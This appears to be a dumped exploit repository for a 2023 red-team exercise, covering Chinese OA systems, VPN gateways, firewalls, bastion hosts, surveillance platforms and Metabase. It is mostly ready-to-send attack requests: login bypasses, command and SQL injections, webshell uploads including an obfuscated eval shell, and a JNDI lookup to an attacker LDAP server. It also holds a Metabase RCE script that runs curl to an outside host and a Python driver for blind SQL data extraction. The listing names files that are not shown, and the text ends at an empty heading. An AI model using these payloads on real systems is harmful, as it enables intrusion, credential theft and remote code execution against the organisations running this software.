├── README.md
├── 汉得SRM 登录绕过.md
├── 深X服应用交付系统命令执行漏洞.md
├── 辰信景云终端安全管理系统登录注入漏洞.md
├── 网神 SecSSL 任意密码修改漏洞.md
├── 锐捷 NBR 路由器文件上传漏洞.md
├── 蓝凌OA前台代码执行.md
├── 金和OASQL注入漏洞 .md
├── 大华智慧园区综合管理平台SQL注入漏洞.md
├── 用友时空KSOASQL注入漏洞.md
├── 绿盟 SAS堡垒机漏洞.md
├── 泛微 E-Cology SQL注入.md
├── 用友 移动管理系统文件上传漏洞.md
├── 网神 SecGate 上传漏洞.md
├── 海康威视漏洞.md
├── 用友 NC Cloud 文件上传漏洞.md
├── 泛微E-Office9文件上传漏洞.md
├── 大华智慧园区综合管理平台 文件上传漏洞.md
├── 通达OA SQL注入漏洞.md
├── 广联达oa 漏洞.md
├── Metabase RCE漏洞.md
├── 安恒 明御运维审计与风险控制系统 任意用户添加漏洞.md
├── Microsoft Outlook 提权漏洞.md
└── GitLab目录遍历漏洞.md
/README.md:
--------------------------------------------------------------------------------
# 2023_Hvv

## Warning: the material here was collected from the internet; do not use it for illegal purposes, you alone bear the consequences
### Enjoy again😏😏😏
### Have Fun 🤣🤣🤣
### Please give me a star ⭐⭐⭐

--------------------------------------------------------------------------------
/汉得SRM 登录绕过.md:
--------------------------------------------------------------------------------
## 汉得SRM tomcat.jsp login bypass

tomcat.jsp writes whatever `dataName`/`dataValue` pair it is given into the session; setting `role_id` and `user_id` is enough for the backend to treat the session as an authenticated user.

```
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
```

Then open the backend at `/main.screen`.

--------------------------------------------------------------------------------
/深X服应用交付系统命令执行漏洞.md:
--------------------------------------------------------------------------------
## 深X服 application delivery system command execution

The `clsMode` value carries a newline-separated command (`%0A` is `\n`; the command here is `ls`) that the report login handler passes on to a shell.

```
POST /rep/login
Host: 10.10.10.1:85

clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
```

--------------------------------------------------------------------------------
/辰信景云终端安全管理系统登录注入漏洞.md:
--------------------------------------------------------------------------------
## 辰信景云终端安全管理系统 login SQL injection

Time-based blind injection in the `username` field of the login API. The `password` value is the MD5 of `admin`; the single quote closes the string and the subquery calls `sleep(3)`, so a response that arrives about three seconds late confirms the injection.

```
POST /api/user/login

captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
```

--------------------------------------------------------------------------------
/网神 SecSSL 任意密码修改漏洞.md:
--------------------------------------------------------------------------------
## 网神 SecSSL 3600 secure access gateway arbitrary password change

`old_pass` is left empty, the target account is the one named in the `last_step_param` cookie (`this_name`, here `test`), and `gw_user_ticket` is just padded with `f` characters; the handler still accepts the change.

```
POST /changepass.php?type=2

Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}

old_pass=&password=Test123!@&repassword=Test123!@
```

--------------------------------------------------------------------------------
/锐捷 NBR 路由器文件上传漏洞.md:
--------------------------------------------------------------------------------
## 锐捷 NBR router fileupload.php arbitrary file upload

`uploadDir` is used as a path component without sanitisation, so `../../321` places the file outside the intended directory, and `name` sets the stored filename (`123.php`). The multipart boundary below is arbitrary and the file content is left empty, as in the original note.

```
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host:
Accept: text/plain, */*; q=0.01
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg


------boundary--
```

--------------------------------------------------------------------------------
/蓝凌OA前台代码执行.md:
--------------------------------------------------------------------------------
## 蓝凌OA front-end code execution (custom.jsp)

custom.jsp takes a JSON object in the `var` parameter and loads `body.file` as a URL; the sample below reads `/etc/passwd` through the `file://` handler.

```
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"file:///etc/passwd"}}
```

--------------------------------------------------------------------------------
/金和OASQL注入漏洞 .md:
--------------------------------------------------------------------------------
## 金和OA C6 GetSqlData.aspx SQL injection

The request body is executed as raw T-SQL, so the usual proof is `xp_cmdshell` (SQL Server) rather than a classic injection string.

```
POST /C6/Control/GetSqlData.aspx/.ashx
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Type: text/plain
Accept-Encoding: gzip

exec master..xp_cmdshell 'ipconfig'
```

--------------------------------------------------------------------------------
/大华智慧园区综合管理平台SQL注入漏洞.md:
--------------------------------------------------------------------------------

## 大华智慧园区综合管理平台 searchJson SQL injection

Error-based injection through the `orderBy` field of the `pageJson` path segment: `updatexml()` raises an XPath error whose message carries the subquery result, here `md5(388609)`. Decoded, the `pageJson` segment is `{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select md5(388609)),0x7e),1)--"}`.

```
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
```

--------------------------------------------------------------------------------
/用友时空KSOASQL注入漏洞.md:
--------------------------------------------------------------------------------
## 用友时空KSOA PayBill SQL injection

Time-based blind injection (SQL Server): the body closes the numeric value with a quote and stacks `WAITFOR DELAY '00:00:03'`, so a true probe answers about three seconds late.

```
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

11'WAITFOR DELAY '00:00:03';-1102360
```

--------------------------------------------------------------------------------
/绿盟 SAS堡垒机漏洞.md:
--------------------------------------------------------------------------------
## 绿盟 SAS bastion host GetFile arbitrary file read
The same traversal can include `www/local_user.php` to log in as any user (third request below).

```
/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
```

## 绿盟 SAS bastion host Exec remote command execution

```
/webconf/Exec/index?cmd=whoami
```

## 绿盟 SAS bastion host local_user.php arbitrary user login

```
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
```

--------------------------------------------------------------------------------
/泛微 E-Cology SQL注入.md:
--------------------------------------------------------------------------------
## 泛微 E-Cology SQL injection (DWR)

The DWR batch passes `c0-param0` straight into a query; `1 AND 1=1` against `1 AND 1=2` gives a boolean oracle. Note that the request path names `CptDwrUtil` while the body's `c0-scriptName` names `DocDwrUtil`; DWR resolves the call from the body fields.

```
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Type: text/plain
Accept-Encoding: gzip

callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 AND 1=1
c0-param1=string:1
batchId=0
```

--------------------------------------------------------------------------------
/用友 移动管理系统文件上传漏洞.md:
--------------------------------------------------------------------------------
## 用友 mobile management system uploadApk.do arbitrary file upload

### Path of the uploaded file: /maupload/apk/a.jsp

The `downloadpath` part keeps the client-supplied filename (`a.jsp`) and the file is served from the web root under `/maupload/apk/`.

```
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword

hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
```

--------------------------------------------------------------------------------
/网神 SecGate 上传漏洞.md:
--------------------------------------------------------------------------------
## 网神 SecGate 3600 firewall obj_app_upfile upload

### Path of the uploaded file: attachements/xxx.php

The `upfile` part is stored under `attachements/` with its original `.php` name; `__hash__` is the form token the page expects and is reproduced here as carried by the original request.

```
POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain



------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
```

--------------------------------------------------------------------------------
/海康威视漏洞.md:
--------------------------------------------------------------------------------
## 海康威视 file upload vulnerabilities

### Path of the uploaded file after upload: /portal/ui/login/..;/..;/new.jsp

Both endpoints accept a `filename` containing `../` and write the file to the absolute path it resolves to, here the `eportal` webapp of the bundled Tomcat. The `..;/` segments in the access path make Tomcat resolve the request to `/new.jsp` in that webapp while the front end sees a path under `/portal/ui/login/`.

### 综合安防管理平台 files arbitrary file upload

```
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<% JSP webshell %>
------WebKitFormBoundary9PggsiM755PLa54a--
```

### 综合安防管理平台 report arbitrary file upload

```
POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<% JSP webshell %>
------WebKitFormBoundary9PggsiM755PLa54a--
```

--------------------------------------------------------------------------------
/用友 NC Cloud 文件上传漏洞.md:
--------------------------------------------------------------------------------
## 用友 NC Cloud jsinvoke arbitrary file upload

`jsinvoke` exposes `nc.itf.iufo.IBaseSPService.saveXStreamConfig`, which writes its first argument to the file named by the second (relative to the server root); a JSP written under `webapps/nc_web/` is then reachable over HTTP. Two payload variants are in circulation.

Variant 1 writes a JSP whose EL expression instantiates the class named by the `error` request parameter and evaluates the `cmd` parameter with it (used below with `bsh.Interpreter`):

```
POST /uapjs/jsinvoke/?action=invoke
Content-Type: application/json

{
  "serviceName":"nc.itf.iufo.IBaseSPService",
  "methodName":"saveXStreamConfig",
  "parameterTypes":[
    "java.lang.Object",
    "java.lang.String"
  ],
  "parameters":[
    "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
    "webapps/nc_web/407.jsp"
  ]
}
```

Variant 2 writes a JSP that performs a JNDI lookup against an attacker-controlled LDAP server (`VPSip` is a placeholder):

```
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host:
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/301.jsp"]}
```

After the upload, request the JSP written by variant 1. The original note uses the name `cmdtest.jsp`; substitute the filename given as the second parameter (`407.jsp` above).

```
/cmdtest.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())
```

--------------------------------------------------------------------------------
/泛微E-Office9文件上传漏洞.md:
--------------------------------------------------------------------------------
## CVE-2023-2523: 泛微 E-Office 9 mobile_upload_save arbitrary file upload

The trailing dot in `filename="1.php."` is the usual Windows trick: the filesystem drops it when the file is written, so a suffix check that reads the last extension does not see `.php` while the stored file is `1.php`. The file content is left empty, as in the original note.

```
POST /Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: 192.168.233.10:8082
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg


------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
```

## CVE-2023-2648: 泛微 E-Office 9 uploadify.php arbitrary file upload

```
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream


------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
```

--------------------------------------------------------------------------------
/大华智慧园区综合管理平台 文件上传漏洞.md:
--------------------------------------------------------------------------------
## 大华智慧园区综合管理平台 file upload

The `Filedata` part of the video-material upload is stored with its original `.jsp` extension. The sample JSP is a harmless proof of write: it prints `md5("123456")` (`e10adc3949ba59abbe56e057f20f883e`) and then deletes itself from disk.

```
POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"

poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--
```

--------------------------------------------------------------------------------
/通达OA SQL注入漏洞.md:
--------------------------------------------------------------------------------
## CVE-2023-4165

The `DELETE_STR` parameter of `/general/system/seal_manage/iweboffice/delete_seal.php` is concatenated into a SQL statement, allowing blind (time-based) extraction of data from the database. The probe below tests whether the database name starts with `T` (`substr(DATABASE(),1,1)=char(84)`); the self-join of `information_schema.columns` only executes when that comparison is true, so a correct guess shows up as a noticeably slower response (heavy-query timing). Decoded: `1) and (substr(DATABASE(),1,1))=char(84) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1`.

```
GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

## CVE-2023-4166

The `DELETE_STR` parameter of `/general/system/seal_manage/dianju/delete_log.php` has the same injection, with the same heavy-query probe.

```
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

## Affected versions
通达OA < v11.10

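The three time-based probes on this page (the `sleep(3)` in the 辰信景云 login, the `WAITFOR DELAY '00:00:03'` in 用友时空 KSOA, and the heavy `information_schema.columns` self-join in the two 通达OA requests above) all reduce to the same oracle: a SQL condition that, when true, makes the response late. The following is an added example of how to drive such an oracle reliably; it is not part of this repository. It measures a baseline with repeated requests and compares medians, so one slow response cannot count as "true", binary-searches each character so a true answer costs at most seven delays per position, and keeps the HTTP layer behind a `probe` callable. `SimulatedTarget` is a constructed stand-in whose database name is made up, and `login_username` wraps a condition into the 辰信景云 username field with `if(...)`, which is the standard conditional form of that payload and not a request taken from the page.

```python
"""Driver for the time-based blind SQL injections documented above.

Added example, not part of the repository.  Network access is hidden
behind a ``probe`` callable so the same driver fits any of the three
products and can be exercised offline against ``SimulatedTarget``.
"""
import statistics
from typing import Callable, List

# A probe sends one request whose SQL condition is ``cond`` and returns the
# elapsed time in seconds; real use wraps requests.post() and time.monotonic().
Probe = Callable[[str], float]


def login_username(cond: str, delay: int = 3) -> str:
    """Username value for the 辰信景云 /api/user/login probe.

    The page's payload always sleeps; wrapping sleep() in if() makes the
    delay conditional (assumption: standard MySQL conditional form).
    """
    return f"admin'and(select*from(select if(({cond}),sleep({delay}),0))a)='"


def is_delayed(timed: List[float], baseline: List[float], delay: float) -> bool:
    """Decide whether the timed responses carried the injected delay.

    Medians of repeated measurements are compared, so one slow baseline
    response (network jitter, a GC pause) cannot flip the verdict; the
    threshold is half the injected delay above the baseline median.
    """
    return statistics.median(timed) - statistics.median(baseline) >= delay / 2


class TimingOracle:
    """Turns a timing probe into a yes/no oracle for SQL conditions."""

    def __init__(self, probe: Probe, delay: float = 3.0, repeats: int = 3):
        self.probe, self.delay, self.repeats = probe, delay, repeats
        # Baseline is measured once, with a condition that is always false.
        self.baseline = [probe("1=2") for _ in range(repeats)]

    def ask(self, cond: str) -> bool:
        timed = [self.probe(cond) for _ in range(self.repeats)]
        return is_delayed(timed, self.baseline, self.delay)


def extract_string(probe: Probe, expr: str, length: int, delay: float = 3.0) -> str:
    """Recover ``expr`` (for example DATABASE()) one character at a time.

    Each position is found by binary search over printable ASCII 32..126,
    so at most seven conditions are asked per character instead of one
    per candidate byte, which matters when every true answer costs
    ``delay`` seconds times ``repeats``.
    """
    oracle = TimingOracle(probe, delay)
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"ascii(substr({expr},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


class SimulatedTarget:
    """Constructed stand-in for a vulnerable endpoint (no real product).

    It evaluates only the conditions extract_string generates, against a
    made-up database name, and returns a fake elapsed time instead of
    sleeping: about 0.2 s normally, plus ``delay`` when the condition is
    true.  Every third response is 0.9 s slower to exercise the median
    logic in is_delayed.
    """

    def __init__(self, secret: str, delay: float = 3.0):
        self.secret, self.delay, self.calls = secret, delay, 0

    def __call__(self, cond: str) -> float:
        self.calls += 1
        jitter = 0.9 if self.calls % 3 == 0 else 0.0
        if cond == "1=2":
            return 0.2 + jitter
        # cond looks like "ascii(substr(DATABASE(),POS,1))>N"
        lhs, _, n = cond.partition(">")
        pos = int(lhs.split(",")[1])
        truth = ord(self.secret[pos - 1]) > int(n)
        return 0.2 + jitter + (self.delay if truth else 0.0)


if __name__ == "__main__":
    target = SimulatedTarget("TD_OA")  # made-up name for the demo
    print("probe username:", login_username("ascii(substr(DATABASE(),1,1))>84"))
    print("recovered:", extract_string(target, "DATABASE()", 5))
```

Against a live target, `probe` would send the request built by `login_username` (or the KSOA / 通达 equivalents) and return the measured round-trip time; keep `repeats` at three or more on noisy links and raise `delay` if the baseline median is already close to the threshold.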
--------------------------------------------------------------------------------
/广联达oa 漏洞.md:
--------------------------------------------------------------------------------
## SQL injection

The `key` parameter of `GetIMDictionary` is injectable; the UNION pulls `F_CODE:F_PWD_MD5` pairs from `T_ORG_USER` (SQL Server syntax, note `top 1812`).

```
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
```

## File upload

The duplicated `filename` attribute in the `Content-Disposition` header (`1.aspx` first, `1.jpg` second) relies on the server checking one value and storing under the other. The ASPX body is a JScript `eval` shell: `ONOQ` assembles the string `unsafe` from character positions of `FRWT`, and `eval(GFMA, ONOQ)` evaluates the `qmq1` form field in unsafe mode.

```
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie:
Connection: close
Content-Length: 421

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text

<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>

------WebKitFormBoundaryFfJZ4PlAZBixjELj--
```

--------------------------------------------------------------------------------
/Metabase RCE漏洞.md:
--------------------------------------------------------------------------------

## CVE-2023-38646

## Affected versions
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < 0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2

## Python script

The pre-authentication endpoint `/api/setup/validate` accepts the setup token that affected builds still expose at `/api/session/properties`, and it will "validate" an H2 connection string. H2's `INIT=` runs SQL on connect, so `CREATE ALIAS` defines a Java method and `CALL` runs it; the script uses a `curl` to a Burp Collaborator host as an out-of-band proof of execution.

```
# https://github.com/0xrobiul/CVE-2023-38646

import argparse

import requests
from colorama import Fore, Style  # pip install colorama

Yellow = Fore.YELLOW + Style.BRIGHT
Cyan = Fore.CYAN + Style.BRIGHT
STOP = Style.RESET_ALL

print(Cyan + "CVE-2023-38646 PoC" + STOP + Yellow + " By: 0xRobiul\n" + STOP)

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", type=str, required=True, help="Target URL.")
parser.add_argument("-t", "--token", type=str, required=True, help="setup-token from /api/session/properties.")
parser.add_argument("-c", "--collaborator", type=str, required=True, help="Burp Collaborator host.")
args = parser.parse_args()

url = args.url.rstrip("/") + "/api/setup/validate"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "Accept": "application/json",
    "Content-Type": "application/json",
    "Connection": "close",
}

# H2 INIT script: define a Java alias that shells out, then call it.  Semicolons
# inside the INIT value must be escaped as "\;" so H2 does not split on them.
h2_init = (
    "CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException "
    "{Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;"
    "CALL SHELLEXEC('curl -d key=0xRobiul " + args.collaborator + "');"
)
payload = {
    "details": {
        "details": {
            "advanced-options": True,
            "classname": "org.h2.Driver",
            "subname": "mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=" + h2_init,
            "subprotocol": "h2",
        },
        "engine": "postgres",
        "name": "x",
    },
    "token": args.token,
}
attk = requests.post(url, headers=headers, json=payload)

print(Cyan + f"Done (HTTP {attk.status_code})!! Check Burp Collaborator!!" + STOP)
```

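A practitioner's first question with CVE-2023-38646 is whether a given instance sits in one of the affected ranges above and whether `/api/session/properties` still leaks `setup-token`, the value the script's `-t` flag needs. The following added example (not part of the repository or the PoC above) turns the version list into a check and reads both fields from a saved copy of that endpoint's JSON. The JSON is constructed; the only assumptions about the real response are that it has a `version` object with a `tag` such as `v0.46.6` and a top-level `setup-token` key, which is where the PoC's help text says the token comes from.

```python
"""Version triage and setup-token lookup for CVE-2023-38646 (added example)."""
import json
from typing import Tuple

# Branch -> first fixed release, copied from the affected-versions list above.
FIXED_IN = {
    "0.43": "0.43.7.2", "0.44": "0.44.7.1", "0.45": "0.45.4.1", "0.46": "0.46.6.1",
    "1.43": "1.43.7.2", "1.44": "1.44.7.1", "1.45": "1.45.4.1", "1.46": "1.46.6.1",
}


def parse_version(tag: str) -> Tuple[int, ...]:
    """'v0.46.6' -> (0, 46, 6); Metabase reports tags with a leading 'v'."""
    return tuple(int(p) for p in tag.lstrip("v").split("."))


def is_affected(tag: str) -> bool:
    """True when tag belongs to a listed branch and is older than its fix.

    Tuple comparison handles the four-part fix releases: (0, 46, 6) sorts
    before (0, 46, 6, 1), and (0, 46, 6, 1) is not before itself.
    Branches absent from the list (e.g. 0.47) are reported as not affected
    because the advisory list above does not name them.
    """
    v = parse_version(tag)
    fixed = FIXED_IN.get(f"{v[0]}.{v[1]}")
    return fixed is not None and v < parse_version(fixed)


def triage(properties_json: str) -> dict:
    """Summarise a saved /api/session/properties response.

    On affected builds the setup token stays valid after initial setup and
    is readable without a session, which is what the PoC relies on; a
    patched build no longer exposes it.  Field names are an assumption
    (see the lead-in).
    """
    props = json.loads(properties_json)
    tag = props["version"]["tag"]
    token = props.get("setup-token") or None
    affected = is_affected(tag)
    return {
        "version": tag,
        "affected": affected,
        "setup_token": token,
        "exploitable": affected and token is not None,
    }


# Constructed sample; the tag and token are made up for the demo.
SAMPLE_PROPERTIES = json.dumps({
    "version": {"tag": "v0.46.6", "date": "2023-06-29"},
    "setup-token": "5a2f3c5b-0c5b-4d6e-9e4b-1f2a3b4c5d6e",
    "site-name": "demo",
})

if __name__ == "__main__":
    print(triage(SAMPLE_PROPERTIES))
```

`exploitable` is the field to gate on: an affected version whose token has been removed (the JSON shows `null` or omits the key) cannot be driven through `/api/setup/validate`, and an exposed token on a fixed version is harmless for this CVE.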
--------------------------------------------------------------------------------
/安恒 明御运维审计与风险控制系统 任意用户添加漏洞.md:
--------------------------------------------------------------------------------
## 安恒 明御运维审计与风险控制系统 xmlrpc.sock arbitrary user creation

